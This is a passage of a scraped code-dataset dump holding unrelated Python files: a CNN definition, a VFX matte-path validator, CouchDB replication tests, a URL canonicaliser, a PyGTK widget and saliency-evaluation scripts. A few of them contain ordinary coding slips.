= np.zeros((height, width), dtype = img.dtype)\n\n\t\tfor i in range(height) :\n\t\t\tfor j in range(width) :\n\t\t\t\tif( img[i][j][0] > 100\n\t\t\t\tand img[i][j][0] < 200\n\t\t\t\tand img[i][j][1] > 100\n\t\t\t\tand img[i][j][1] < 200\n\t\t\t\tand img[i][j][2] > 100\n\t\t\t\tand img[i][j][2] < 200) :\n\t\t\t\t\tmask[i][j] = 1\n\n\n\t\tarr = cv2.bitwise_and(img, img, mask=mask)\n\t\ttemp_res=model.predict(np.array([arr]))\n\t\ttemp2 = np.argmax(temp_res, axis=1)\n\t\tres.append(int(temp2))\n\ttest_labels_after=res\n\tk=0\n\tn=len(res)\n\tfor i in range(n):\n\t\tif res[i]==y_test[i]:\n\t\t\tk=k+1\n\tk=k/n\n\tprint('accuracy=',k)\n\tacc=acc+k\nacc=acc/no_of_loops\nprint('final accuracy=', acc)\n\nfor i in range(len(test_names)):\n\tprint(test_names[-44:],\"\t\t\",test_labels_before,\"\t\",test_labels_after)\n","sub_path":"Vegetation_removed_as_input_qualitative.py","file_name":"Vegetation_removed_as_input_qualitative.py","file_ext":"py","file_size_in_byte":4557,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"98295552","text":"import tensorflow as tf\nimport init\nimport layers\n\ngraph = tf.get_default_graph()\nconfig = tf.ConfigProto()\nconfig.gpu_options.per_process_gpu_memory_fraction = 0.9\nconfig.gpu_options.allow_growth = True\n\nX = tf.placeholder(tf.float32, [None, init.dict['col'], init.dict['row'], 3], name='input')\nY = tf.placeholder(tf.int32, [None], name='label')\nnum_classes = init.dict['num_classes']\n\n\n\nwith tf.variable_scope('CNN'):\n print('[X]:', X.get_shape().as_list())\n\n # [conv_1]\n layer1 = layers.conv_layer(X, 11, 4, 96, '1', padding='VALID', biases_value=0.0, **init.dict)\n relu1 = tf.nn.relu(layer1)\n print('[conv_1]:', relu1.get_shape().as_list())\n\n pool1 = layers.max_pool(relu1, 3, 2, padding='VALID')\n print('[pool_1]:', pool1.get_shape().as_list())\n\n # [conv_2]\n layer2 = layers.conv_layer(pool1, 5, 1, 256, '2', padding='SAME', biases_value=0.1, **init.dict)\n relu2 = tf.nn.relu(layer2)\n print('[conv_2]:', relu2.get_shape().as_list())\n\n pool2 = layers.max_pool(relu2, 3, 2, padding='VALID')\n print('[pool_2]:', pool2.get_shape().as_list())\n\n # [conv_3]\n layer3 = layers.conv_layer(pool2, 3, 1, 384, '3', padding='SAME', biases_value=0.0, **init.dict)\n relu3 = tf.nn.relu(layer3)\n print('[conv_3]:', relu3.get_shape().as_list())\n\n # [conv_4]\n layer4 = layers.conv_layer(relu3, 3, 1, 384, '4', padding='SAME', biases_value=0.0, **init.dict)\n relu4 = tf.nn.relu(layer4)\n print('[conv_4]:', relu4.get_shape().as_list())\n\n # [conv_5]\n layer5 = layers.conv_layer(relu4, 3, 1, 256, '5', padding='SAME', biases_value=0.1, **init.dict)\n relu5 = tf.nn.relu(layer5)\n print('[conv_5]:', relu5.get_shape().as_list())\n\n pool5 = layers.max_pool(relu5, 3, 2, padding='VALID')\n print('[pool_2]:', pool5.get_shape().as_list())\n\n # [fc_1]\n dropout_prob = 0.5\n fc1 = layers.fc_layer(pool5)\n fc1 = tf.nn.relu(fc1)\n fc1 = tf.nn.dropout(fc1, dropout_prob)\n print('[fc_1]:', fc1.get_shape().as_list())\n\n # [fc_2]\n fc2 = layers.fc_layer(fc1)\n fc2 = tf.nn.relu(fc2)\n fc2 = tf.nn.dropout(fc2, dropout_prob)\n print('[fc_2]:', fc2.get_shape().as_list())\n\n # [fc_3]\n fc3 = layers.fc_layer(fc2)\n fc3 = tf.nn.relu(fc3)\n fc3 = tf.nn.dropout(fc3, dropout_prob)\n print('[fc_1]:', fc3.get_shape().as_list())\n\n out = layers.fc_layer(fc3, softmax=True, out_dim=num_classes)\n print('[dense]:', out.get_shape().as_list())\n\n\nwith tf.variable_scope('Loss'):\n loss = tf.reduce_mean(tf.nn.sparse_softmax_cross_entropy_with_logits(labels=Y, logits=out))\n\n\ntrain = tf.train.AdamOptimizer(0.1).minimize(loss)\nsaver = tf.train.Saver()","sub_path":"CNN.py","file_name":"CNN.py","file_ext":"py","file_size_in_byte":2628,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"165282805","text":"#!/usr/bin/python\n\nimport re\nimport csv\nimport sys\nimport os\n\nimport matte_list_parser as mlp\nreload(mlp)\n\n\n\n\ndef parse_stereo_shotstring(shotstring, line = None):\n bits = shotstring.split('/') # split on slashes\n \n bit_dict ={}\n bit_dict['spool'] = bits[4]\n bit_dict['shotdir'] = bits[5]\n bit_dict['resolution']= bits[6]\n bit_dict['eye']= bits[7]\n bit_dict['file']= bits[8]\n \n bit_dict['file_eye'] = bit_dict['file'].split('_')[len(bit_dict['shotdir'].split('_'))-1]\n bit_dict['file_stereo_version'] = bit_dict['file'].split('_')[len(bit_dict['shotdir'].split('_'))].split('.')[0]\n bit_dict['extended_shotstring'] = '_'.join(bit_dict['shotdir'].split('_')[0:-1])\n bit_dict['stereo_version'] = bit_dict['shotdir'].split('_')[-1].split('.')[0]\n\n bit_dict['rawstring']=shotstring\n bit_dict['line'] = line\n return bit_dict\n\n\n\n\ndef parse_shotstring(shotstring, line = None):\n bits = shotstring.split('/') # split on slashes\n \n bit_dict ={}\n if bits[3].endswith('S3D'):\n if bits[4] == 'mono_base':\n bit_dict['vendor'] = 'MONO'\n else:\n bit_dict['vendor'] = 'S3D'\n elif bits[3].endswith('VFX'):\n bit_dict['vendor'] = 'VFX'\n else:\n bit_dict['vendor'] = 'UNKNOWN'\n \n\n if bit_dict['vendor'] == 'S3D':\n bit_dict['spool'] = bits[4]\n bit_dict['shotdir'] = bits[5]\n bit_dict['resolution']= bits[6]\n bit_dict['eye']= bits[7]\n bit_dict['matte'] = bits[8]\n bit_dict['file']= bits[9]\n bit_dict['file_stereo_version'] = bit_dict['file'].split('_')[-1]\n \n bit_dict['file_eye'] = bit_dict['file'].split('_')[len(bit_dict['shotdir'].split('_'))-1]\n bit_dict['file_stereo_version'] = bit_dict['file'].split('_')[len(bit_dict['shotdir'].split('_'))]\n bit_dict['extended_shotstring'] = '_'.join(bit_dict['shotdir'].split('_')[0:-1])\n bit_dict['stereo_version'] = bit_dict['shotdir'].split('_')[-1]\n\n \n \n elif bit_dict['vendor'] == 'VFX':\n bit_dict['spool'] = None\n bit_dict['shotdir'] = bits[4]\n bit_dict['resolution']= bits[5]\n bit_dict['eye']= bits[6]\n bit_dict['file']= bits[7]\n bit_dict['extended_shotstring'] = None\n bit_dict['stereo_version'] = None\n \n \n elif bit_dict['vendor'] == 'UNKNOWN':\n bit_dict['spool'] = None\n bit_dict['shotdir'] = bits[4]\n bit_dict['resolution']= bits[5]\n bit_dict['eye']= bits[6]\n bit_dict['file']= bits[7]\n \n elif bit_dict['vendor'] == 'MONO':\n bit_dict['spool'] = bits[4]\n bit_dict['shotdir'] = bits[5]\n bit_dict['resolution']= bits[6]\n bit_dict['eye']= None\n bit_dict['file']= bits[7]\n \n bit_dict['rawstring']= shotstring\n bit_dict['line'] = line\n return bit_dict\n\n \ndef validate_parse(the_dict, ignore_nontga = False):\n ''' internal test suite '''\n \n errors = []\n \n # check - TGAs? Flag if not.\n if the_dict['file'].split('.')[-1].lower() != 'tga' and not ignore_nontga:\n errors+= ['non-TGA extension']\n\n # check - file contains same eye as eyedir\n if the_dict['file_eye'] != the_dict['eye'][0] :\n errors+= ['file eye/dir eye mismatch ({fe} vs {e})'.format(fe=the_dict['file_eye'], e=the_dict['eye'])]\n \n # check - file is same as shotdir, matches on seq/shot/v/sp/opt/s/etc\n if not the_dict['file'].startswith(the_dict['extended_shotstring']):\n errors+= ['file shotstring/dir mismatch ({a} vs {b})'.format(a=the_dict['file'], b=the_dict['extended_shotstring'], ) ]\n \n if the_dict['file_stereo_version'] != the_dict['stereo_version']:\n errors+= ['file stereo ver/dir stereo ver mismatch ({eye}:{a} vs {b})'.format(a=the_dict['file_stereo_version'], eye =the_dict['eye'], b=the_dict['stereo_version'])]\n \n\n return errors\n \n \n\ndef check_mattepack(list_of_mattes):\n \n\n \n errors = []\n\n # if there are no mattes in use\n if len(list_of_mattes) == 0:\n errors+= ['no mattes in use']\n\n # if all mattes are of type VFX\n ven_list = []\n for v in list_of_mattes:\n ven_list += [v['vendor']]\n\n if 'UNKNOWN' in ven_list:\n errors += ['1:UNKNOWN/weirdly named matte in use']\n \n if 'VFX' in ven_list and 'S3D' not in ven_list:\n errors += ['2:only VFX mattes in use (no S3D)']\n \n if 'VFX' in ven_list and 'S3D' in ven_list:\n errors += ['1:S3D and VFX mixed mattes']\n\n # now do detailed matte level checking\n for matte in list_of_mattes:\n if matte['vendor'] == 'S3D':\n if matte['file_eye'] != matte['eye'][0]:\n errors+= ['0:file eye/dir eye mismatch ({a} vs {b}, line {line})'.format(line=matte['line'], a=matte['file_eye'], b=matte['eye'])]\n \n if matte['file'].split('.')[-1].lower() != 'tga':\n errors+= ['2:non-TGA extension (line {line})'.format(line=matte['line'])]\n \n # check - file is same as shotdir, matches on seq/shot/v/sp/opt/s/etc\n if not matte['file'].startswith(matte['extended_shotstring']):\n errors+= ['0:file shotstring/dir mismatch ({a} vs {b}, line {line})'.format(a=matte['file'], b= matte['extended_shotstring'], line=matte['line'])]\n \n if matte['file_stereo_version'] != matte['stereo_version']:\n errors+= ['0:file stereo ver/dir stereo ver mismatch ({a} vs {b},line {line})'.format(line=matte['line'], a=matte['file_stereo_version'],b= matte['stereo_version'] )]\n tmpset = []\n for matte in list_of_mattes:\n try:\n tmpset += [matte['extended_shotstring']]\n except KeyError:\n errors += ['1:UNKNOWN matte spotted']\n pass\n \n tmpset = list(set(tmpset))\n if len(tmpset) > 1:\n errors += [\"0:multiple matte versions in use ({a})\".format(a=str(tmpset))]\n \n # need to check for left and rightness.\n eyes = []\n for matte in list_of_mattes:\n eyes += [matte['eye']]\n if len(list_of_mattes) !=0:\n if 'left' not in eyes and 'right' not in eyes :\n errors += ['1:no eyes, but something found'] \n elif 'left' not in eyes or 'right' not in eyes:\n errors += ['0:only one eye']\n return errors","sub_path":"scripts/DI_matte_check/lib/spool_list_parser.py","file_name":"spool_list_parser.py","file_ext":"py","file_size_in_byte":6351,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"450729935","text":"import random\nimport time\nfrom threading import Thread\nimport unittest\nfrom nose import tools\nimport uuid\nfrom testconfig import config\nfrom couchdbkit import client\nimport logger\n\nclass BasicTests(unittest.TestCase):\n\n nodes = []\n servers = []\n cleanup_dbs = []\n\n def setUp(self):\n self.log = logger.logger(\"basictests\")\n \n node_names = ['couchdb-local', 'couchdb-remote-1', 'couchdb-remote-2']\n for name in node_names:\n node = config[name]\n self.nodes.append(node)\n url = \"http://{0}:{1}/\".format(node['ip'], node['port'])\n server = client.Server(url, full_commit=False)\n self.servers.append(server)\n \n def tearDown(self):\n for db in self.cleanup_dbs:\n for server in self.servers:\n try:\n #pass\n server.delete_db(db)\n except Exception:\n pass\n\n #all_dbs = [db for db in self.server.all_dbs()]\n #for db in all_dbs:\n # if db.find(\"doctest\") != -1:\n # self.server.delete_db(db)\n self.cleanup_dbs = []\n\n def _get_db_name(self):\n name = \"doctests-{0}\".format(str(uuid.uuid4())[:6])\n self.cleanup_dbs.append(name)\n return name\n\n def _isodd(self, num):\n return num & 1 and True or False\n\n def _populate_database(self, server, server_ip, num_db, num_doc, num_attachment, first_only=False):\n text_attachment = \"a text attachment\"\n\n local_dbs = []\n for i in range(num_db):\n db_name = self._get_db_name()\n local_dbs.append(db_name)\n db = server.get_or_create_db(db_name)\n if i == 0 or not first_only:\n for j in range(num_doc):\n if self._isodd(j):\n doc = {\"_id\": str(j), \"a\": j, \"b\": str(uuid.uuid4())[:6], \"node\": server_ip, \"type\": \"odd\" }\n else:\n doc = {\"_id\": str(j), \"a\": j, \"b\": str(uuid.uuid4())[:6], \"node\": server_ip, \"type\": \"even\" }\n db.save_doc(doc)\n for k in range(num_attachment):\n db.put_attachment(doc, text_attachment, \"test_\" + str(k), \"text/plain\")\n\n return local_dbs\n\n def test_load_db(self):\n num_db = 10\n num_doc = 100\n num_attachment = 0\n self._popoluate_database(num_db, num_doc, num_attachment)\n\n def test_load_db_with_attachment(self):\n num_db = 10\n num_doc = 100\n num_attachment = 5\n self._popoluate_database(num_db, num_doc, num_attachment)\n \n def test_local_to_local(self):\n num_doc=5\n continuous = False\n local_dbs = self._populate_database(self.servers[0], self.nodes[0]['ip'], 2, num_doc, 5, True)\n url = \"http://{0}:{1}\".format(self.nodes[0]['ip'], self.nodes[0]['port']) + \"/\"\n source_url = url + local_dbs[0]\n target_url = url + local_dbs[1]\n self.servers[0].replicate(source_url, target_url, continuous=continuous, cancel=False, create_target=True)\n if not continuous: \n db = self.servers[0].get_or_create_db(local_dbs[1])\n result = db.all_docs()\n self.assertEqual(result.total_rows, num_doc)\n\n def _replicate_db(self, source_server, source_node, remote_node, local_db, continuous):\n source_url = \"http://{0}:{1}\".format(source_node['ip'], source_node['port']) + \"/\" + local_db\n target_url = \"http://{0}:{1}\".format(remote_node['ip'], remote_node['port']) + \"/\" + local_db\n source_server.replicate(source_url, target_url, continuous=continuous, cancel=False, create_target=True)\n\n def test_local_to_remote(self):\n num_doc=5\n continuous = False\n local_dbs = self._populate_database(self.servers[0], self.nodes[0]['ip'], 5, num_doc, 5, False)\n for db in local_dbs:\n for remote_node in self.nodes[1:]:\n replica = Thread(target=self._replicate_db, args=(self.servers[0], self.nodes[0], remote_node, db, continuous,))\n replica.start()\n replica.join()\n\n def test_local_to_local_with_attachment(self):\n num_doc=5\n continuous = False\n local_dbs = self._populate_database(self.servers[0], self.nodes[0]['ip'], 2, num_doc, 5, True)\n url = \"http://{0}:{1}\".format(self.nodes[0]['ip'], self.nodes[0]['port']) + \"/\"\n source_url = url + local_dbs[0]\n target_url = url + local_dbs[1]\n self.servers[0].replicate(source_url, target_url, continuous=continuous, cancel=False, create_target=True)\n if not continuous: \n db = self.servers[0].get_or_create_db(local_dbs[1])\n result = db.all_docs()\n self.assertEqual(result.total_rows, num_doc)\n\n def _filter(self, db_name):\n design_name = \"_design/test_filter\";\n design_doc = {\n \"_id\": design_name,\n \"language\": \"javascript\",\n \"filters\": {\n \"even\": \"\"\"function(doc, req) {\n if (doc.type && doc.type == \"even\") {\n return true;\n } else {\n return false;\n }\n}\"\"\"\n }\n }\n db = self.servers[0].get_or_create_db(db_name)\n if not db.doc_exist(design_name):\n db.save_doc(design_doc)\n\n def test_local_to_local_with_filter(self):\n num_doc=10\n continuous = False\n local_dbs = self._populate_database(self.servers[0], self.nodes[0]['ip'], 2, num_doc, 5, True)\n self._filter(local_dbs[0])\n url = \"http://{0}:{1}\".format(self.nodes[0]['ip'], self.nodes[0]['port']) + \"/\"\n source_url = url + local_dbs[0]\n target_url = url + local_dbs[1]\n self.servers[0].replicate(source_url, target_url, continuous=continuous, cancel=False, create_target=True, filter=\"test_filter/even\")\n if not continuous: \n db = self.servers[0].get_or_create_db(local_dbs[1])\n result = db.all_docs()\n self.assertEqual(result.total_rows, num_doc/2)\n\n def _compact_db(self, db_name):\n db = self.servers[0].get_or_create_db(db_name)\n db.compact()\n while (db.info()['compact_running'] == True) :\n time.sleep(1)\n\n def test_local_to_local_while_compacting(self):\n num_doc=5\n continuous = False\n local_dbs = self._populate_database(self.servers[0], self.nodes[0]['ip'], 2, num_doc, 0, True)\n\n compactor = Thread(target=self._compact_db, args=(local_dbs[0],))\n compactor.start()\n\n url = \"http://{0}:{1}\".format(self.nodes[0]['ip'], self.nodes[0]['port']) + \"/\"\n source_url = url + local_dbs[0]\n target_url = url + local_dbs[1]\n self.servers[0].replicate(source_url, target_url, continuous=continuous, cancel=False, create_target=True)\n if not continuous: \n db = self.servers[0].get_or_create_db(local_dbs[1])\n result = db.all_docs()\n self.assertEqual(result.total_rows, num_doc)\n compactor.join()\n\n def _random_doc(self, howmany=1):\n docs = []\n for i in range(howmany):\n id = \"crud_{0}\".format(i)\n k1 = \"a\"\n v1 = random.randint(0, 10000)\n k2 = \"b\"\n v2 = random.randint(0, 10000)\n if self._isodd(i):\n type = \"odd\" \n else:\n type = \"even\"\n #have random key-values here ?\n doc = {\"_id\": id, k1: v1, k2: v2, \"type\":type}\n docs.append(doc)\n return docs\n\n def _crud_db(self, db_name):\n num_doc = 10\n db = self.servers[0].get_or_create_db(db_name)\n docs = self._random_doc(num_doc)\n for doc in docs:\n db.save_doc(doc)\n \n for i in range(num_doc):\n fetched = db.get(\"crud_{0}\".format(i))\n fetched[\"c\"] = \"new field\"\n db.save_doc(fetched)\n \n #for doc in docs:\n # db.delete_doc(doc)\n \n\n def test_local_to_local_while_crud(self):\n num_doc=5\n continuous = False\n local_dbs = self._populate_database(self.servers[0], self.nodes[0]['ip'], 2, num_doc, 0, True)\n\n running = Thread(target=self._crud_db, args=(local_dbs[0],))\n running.start()\n\n url = \"http://{0}:{1}\".format(self.nodes[0]['ip'], self.nodes[0]['port']) + \"/\"\n source_url = url + local_dbs[0]\n target_url = url + local_dbs[1]\n self.servers[0].replicate(source_url, target_url, continuous=continuous, cancel=False, create_target=True)\n running.join()\n\n def test_local_to_local_with_filter_while_crud(self):\n num_doc=10\n continuous = False\n local_dbs = self._populate_database(self.servers[0], self.nodes[0]['ip'], 2, num_doc, 5, True)\n self._filter(local_dbs[0])\n\n running = Thread(target=self._crud_db, args=(local_dbs[0],))\n running.start()\n\n url = \"http://{0}:{1}\".format(self.nodes[0]['ip'], self.nodes[0]['port']) + \"/\"\n source_url = url + local_dbs[0]\n target_url = url + local_dbs[1]\n self.servers[0].replicate(source_url, target_url, continuous=continuous, cancel=False, create_target=True, filter=\"test_filter/even\")\n if not continuous: \n db = self.servers[0].get_or_create_db(local_dbs[1])\n result = db.all_docs()\n self.assertEqual(result.total_rows, num_doc)\n\n def test_local_circle(self):\n num_doc=5\n num_db=5\n continuous = False\n url = \"http://{0}:{1}\".format(self.nodes[0]['ip'], self.nodes[0]['port']) + \"/\"\n local_dbs = local_dbs = self._populate_database(self.servers[0], self.nodes[0]['ip'], num_db, num_doc, 0, True)\n for i in range(num_db):\n source_db = local_dbs[i]\n if i+1 >= num_db:\n target_db = local_dbs[0]\n else:\n target_db = local_dbs[i+1]\n self.servers[0].replicate(url+source_db, url+target_db, continuous=continuous, cancel=False, create_target=True)\n if not continuous:\n self.assertEqual(self.servers[0].get_or_create_db(source_db).all_docs().total_rows, \n self.servers[0].get_or_create_db(target_db).all_docs().total_rows)\n \n def test_local_to_remote_circle(self):\n num_db=5\n num_doc=5\n continuous = True\n local_dbs = self._populate_database(self.servers[0], self.nodes[0]['ip'], num_db, num_doc, 5, False)\n num_node = len(self.nodes)\n for i in range(num_node):\n if i+1 >= num_node:\n target_node = self.nodes[0]\n else:\n target_node = self.nodes[i+1]\n for db in local_dbs:\n replica = Thread(target=self._replicate_db, args=(self.servers[0], self.nodes[i], target_node, db, continuous,))\n replica.start()\n replica.join()\n\n def _trigger_replication(self, source_server, source_node, target_node, dbs, continuous):\n for db in dbs:\n replica = Thread(target=self._replicate_db, args=(source_server, source_node, target_node, db, continuous,))\n replica.start()\n replica.join()\n\n def test_two_way_replication(self):\n num_db=1\n num_doc=2\n continuous= True\n dbs = []\n for i in range(len(self.nodes)):\n local_dbs = self._populate_database(self.servers[i], self.nodes[i]['ip'], num_db, num_doc, 0, False)\n dbs.append(local_dbs)\n #a -><- b\n self._trigger_replication(self.servers[0], self.nodes[0], self.nodes[1], dbs[0], continuous)\n self._trigger_replication(self.servers[1], self.nodes[1], self.nodes[0], dbs[1], continuous)\n #a -><- c\n self._trigger_replication(self.servers[0], self.nodes[0], self.nodes[2], dbs[0], continuous)\n self._trigger_replication(self.servers[2], self.nodes[2], self.nodes[0], dbs[2], continuous)\n #b -><- c\n self._trigger_replication(self.servers[1], self.nodes[1], self.nodes[2], dbs[1], continuous)\n self._trigger_replication(self.servers[2], self.nodes[2], self.nodes[1], dbs[2], continuous)\n\n self.assertEqual(len(self.servers[1].all_dbs())-2, 3) # exclude default _replicator and _user db\n self.assertEqual(len(self.servers[2].all_dbs())-2, 3) # exclude default _replicator and _user db\n self.assertEqual(len(self.servers[0].all_dbs())-2, 3) # exclude default _replicator and _user db\n","sub_path":"src/replicate.py","file_name":"replicate.py","file_ext":"py","file_size_in_byte":12570,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"106997471","text":"#!/usr/bin/python3\r\n# -*- coding: iso-8859-2 -*\r\n\r\nprint(\"Szukamy liczby sposobów, na jakie można pokryć planszę 4x4 identycznymi klockami 2x1.\")\r\n# Recursive function to find number of ways to fill a n x 4 matrix\r\n# with 1 x 4 tiles\r\ndef totalWays(n):\r\n\r\n\t# base cases\r\n\tif n < 1:\r\n\t\treturn 0\r\n\r\n\tif n < 2:\r\n\t\treturn 1\r\n\r\n\tif n == 2:\r\n\t\treturn 2\r\n\r\n\t# combine results of placing a tile horizontally and\r\n\t# placing 4 tiles vertically\r\n\treturn totalWays(n - 1) + totalWays(n - 2)\r\n\r\n\r\nn = 4\r\nprint(totalWays(n))\r\n","sub_path":"z13/kopia13_6.py","file_name":"kopia13_6.py","file_ext":"py","file_size_in_byte":517,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"585283549","text":"'''\nCreated on Mar 31, 2015\n\n@author: ouyiqi\n'''\nimport urllib.parse\n\nclass URLProcessor:\n #canonicalize url\n def canonicalize(self, base, url):\n #lower case\n url = url.lower()\n parsed_url = urllib.parse.urlparse(url)\n #print(parsed_url)\n if parsed_url.scheme and parsed_url.scheme == 'http':\n #if has scheme:'http', get domain and remove port\n netloc = self.remove_port(parsed_url.netloc)\n url = urllib.parse.urlunparse((parsed_url.scheme,netloc,parsed_url.path, parsed_url.params,\n parsed_url.query, ''))\n elif parsed_url.scheme and parsed_url.scheme != 'http':\n #ignore other schemes\n return None\n elif not parsed_url.scheme:\n #if only has path, then get absolute path\n url = urllib.parse.urljoin(base, url, False)\n #remove duplicate slashes\n url = url[:7] + url[7:].replace('//', '/')\n return url\n \n def remove_port(self, netloc):\n i = netloc.find(':')\n if i >= 0:\n netloc = netloc[:i]\n return netloc\n \n #input url has should been canonicalized\n def get_domain_name(self, url):\n parsed_url = urllib.parse.urlparse(url)\n return '{url.scheme}://{url.netloc}'.format(url = parsed_url)\n \n\n\nif __name__ == \"__main__\":\n url1 = \"http://wWw.nbcnews.com//news/us-news/men-h你hello/123#hello\"\n url4 = \"#~news/us-news/men-h你hello/123#hello\"\n url2 = \"../hupu.com\"\n url3 = \"http://www.yahoo.com\"\n url_processor = URLProcessor()\n print(url_processor.get_domain_name(url_processor.canonicalize(url1, url2)))\n \n \n \n ","sub_path":"WebCrawler/url_process.py","file_name":"url_process.py","file_ext":"py","file_size_in_byte":1700,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"461818298","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nimport pygtk\n\npygtk.require(\"2.0\")\nimport gtk\nimport asking_program\nfrom tools import *\n\nclass AskingProgramWidget(gtk.VBox):\n def __init__(self, program):\n gtk.VBox.__init__(self)\n self.__program = program\n self.__type_model = gtk.ListStore(str)\n for i in asking_program.PROCESS_TYPES:\n self.__type_model.append([i])\n self.tv = self.__build_table(program)\n sw = gtk.ScrolledWindow()\n sw.set_policy(gtk.POLICY_AUTOMATIC, gtk.POLICY_AUTOMATIC)\n self.pack_start(sw, True)\n sw.add(self.tv)\n self.show_all()\n\n def __build_table(self, program):\n tv = gtk.TreeView()\n tv.set_model(program)\n tv.set_search_column(asking_program.Column.CHANNEL)\n tv.get_selection().set_mode(gtk.SELECTION_MULTIPLE)\n tv.set_property(\"rubber-banding\", True)\n\n # канал\n cell = gtk.CellRendererText()\n column = gtk.TreeViewColumn(\"Канал\", cell,\n text=asking_program.Column.CHANNEL)\n tv.append_column(column)\n\n # конец программы\n cell = gtk.CellRendererToggle()\n cell.connect('toggled', self.__on_last_toggled)\n column = gtk.TreeViewColumn(None, cell,\n active=asking_program.Column.IS_LAST)\n column.set_widget(create_vertical_label(\"Конец программы\"))\n tv.append_column(column)\n\n # тип обработки\n cell = gtk.CellRendererCombo()\n cell.connect(\"changed\", self.__on_type_changed)\n cell.set_properties(model=self.__type_model,\n text_column=0,\n editable=True,\n has_entry=False)\n column = gtk.TreeViewColumn('Метод обработки', cell,\n text=asking_program.Column.TYPE,)\n tv.append_column(column)\n\n # логический адрес\n cell = gtk.CellRendererText()\n column = gtk.TreeViewColumn(None, cell,\n text=asking_program.Column.ADDRESS)\n column.set_widget(create_vertical_label(\"Логический адрес\"))\n cell.set_property(\"editable\", True)\n cell.connect(\"edited\", self.__on_address_edited)\n tv.append_column(column)\n\n # полный адрес\n cell = gtk.CellRendererText()\n column = gtk.TreeViewColumn(None, cell,\n text=asking_program.Column.RESULT)\n column.set_widget(create_vertical_label(\"Полный адрес\"))\n tv.append_column(column)\n\n # Коментарий\n cell = gtk.CellRendererText()\n column = gtk.TreeViewColumn(\"Автоматический комментарий\", cell,\n text=asking_program.Column.COMMENT)\n tv.append_column(column)\n\n return tv\n\n def __on_last_toggled(self, cell, path):\n # get toggled iter\n model = self.tv.get_model()\n i = model.get_iter((int(path),))\n fixed = model.get_value(i, asking_program.Column.IS_LAST)\n fixed = not fixed\n model.set(i, asking_program.Column.IS_LAST, fixed)\n\n self.__update_result(i)\n\n def __on_type_changed(self, widget, path, new_iter):\n model = self.tv.get_model()\n iterator = model.get_iter(path)\n model[path][asking_program.Column.TYPE] = self.__type_model[new_iter][0]\n self.__update_result(iterator)\n\n def __on_address_edited(self, cell, path, text):\n model = self.tv.get_model()\n iterator = model.get_iter(path)\n model[path][asking_program.Column.ADDRESS] = text\n self.__update_result(iterator)\n self.__update_comment(iterator)\n\n def __update_result(self, iterator):\n model = self.tv.get_model()\n channel, is_last, processing, address, result, comment = model[iterator]\n try:\n result = 1<<15 if is_last else 0\n result += asking_program.PROCESS_TYPES.index(processing) << 12\n result += int(address)\n except Exception:\n pass\n else:\n model[iterator][asking_program.Column.RESULT] = str(result)\n\n def __update_comment(self, iterator):\n model = self.tv.get_model()\n channel, is_last, processing, address, result, comment = model[iterator]\n comment = \"\"\n try:\n address = int(address)\n comment = self.__program.table.get_comment(address)\n except Exception:\n pass\n model[iterator][asking_program.Column.COMMENT] = comment","sub_path":"ppstmi/asking_program_widget.py","file_name":"asking_program_widget.py","file_ext":"py","file_size_in_byte":4712,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"344293347","text":"# -*- coding: utf-8 -*-\r\nimport random\r\nimport os\r\nimport shutil\r\nfrom evalutor_my_bbox import Eval_thread\r\nimport cv2\r\nimport matplotlib.pyplot as plt\r\nfrom PIL import Image\r\nfrom skimage import data,filters\r\n\r\nimport numpy as np\r\n\r\ndataset_list = ['davis_test','Visal','Easy-35','VOS_test_png']\r\n\r\nfor sj in range(0,len(dataset_list)):\r\n\r\n dataset = dataset_list[sj]\r\n #\r\n fs_path = r'D:\\code\\new_5\\7_paste\\calss\\no_full/%s/'%(dataset)\r\n ms_path = r'D:\\dataset\\flo_s\\CPD_ms\\720_flo_CPD_VGG_fine_davis2000all_lr4_b10_49_bi/%s/'%(dataset)\r\n\r\n save_path = r'D:\\code\\new_5\\7_paste\\class_no_full_smeature_v/%s/'%(dataset)\r\n\r\n videos = os.listdir(fs_path)\r\n\r\n for i in range(0,len(videos)):\r\n #GT_object_level\r\n #ground-truth\r\n video=videos[i]\r\n pris_path = fs_path+video\r\n mss_path = ms_path+video\r\n pris=os.listdir(pris_path)\r\n\r\n if not os.path.exists(save_path+video):\r\n os.makedirs(save_path+video)\r\n\r\n length=len(pris)\r\n for a in range(0,length-1):\r\n\r\n pri=pris[a]\r\n\r\n pri_img_path=pris_path+'/'+pri\r\n ms_img_path=mss_path+'/'+pri\r\n\r\n if os.path.exists(pri_img_path):\r\n\r\n gt=cv2.imread(pri_img_path,0)\r\n gt = gt.astype(np.float32)\r\n gt=gt/255\r\n\r\n img_1=cv2.imread(ms_img_path,0)\r\n img_1 = img_1.astype(np.float32)\r\n img_1=img_1/255\r\n\r\n shape=gt.shape\r\n width=shape[1]\r\n hight=shape[0]\r\n\r\n img_1 =cv2.resize(img_1,(width,hight))\r\n\r\n w=Eval_thread(gt,img_1,True)\r\n w=round(w.run(),3)\r\n print(w)\r\n\r\n cv2.imwrite(save_path+video+'/'+pri[:-4]+'_'+str('%.3f'%(w))+'.png',gt*255)\r\n","sub_path":"Tools/s_measure_fs_ms.py","file_name":"s_measure_fs_ms.py","file_ext":"py","file_size_in_byte":1824,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
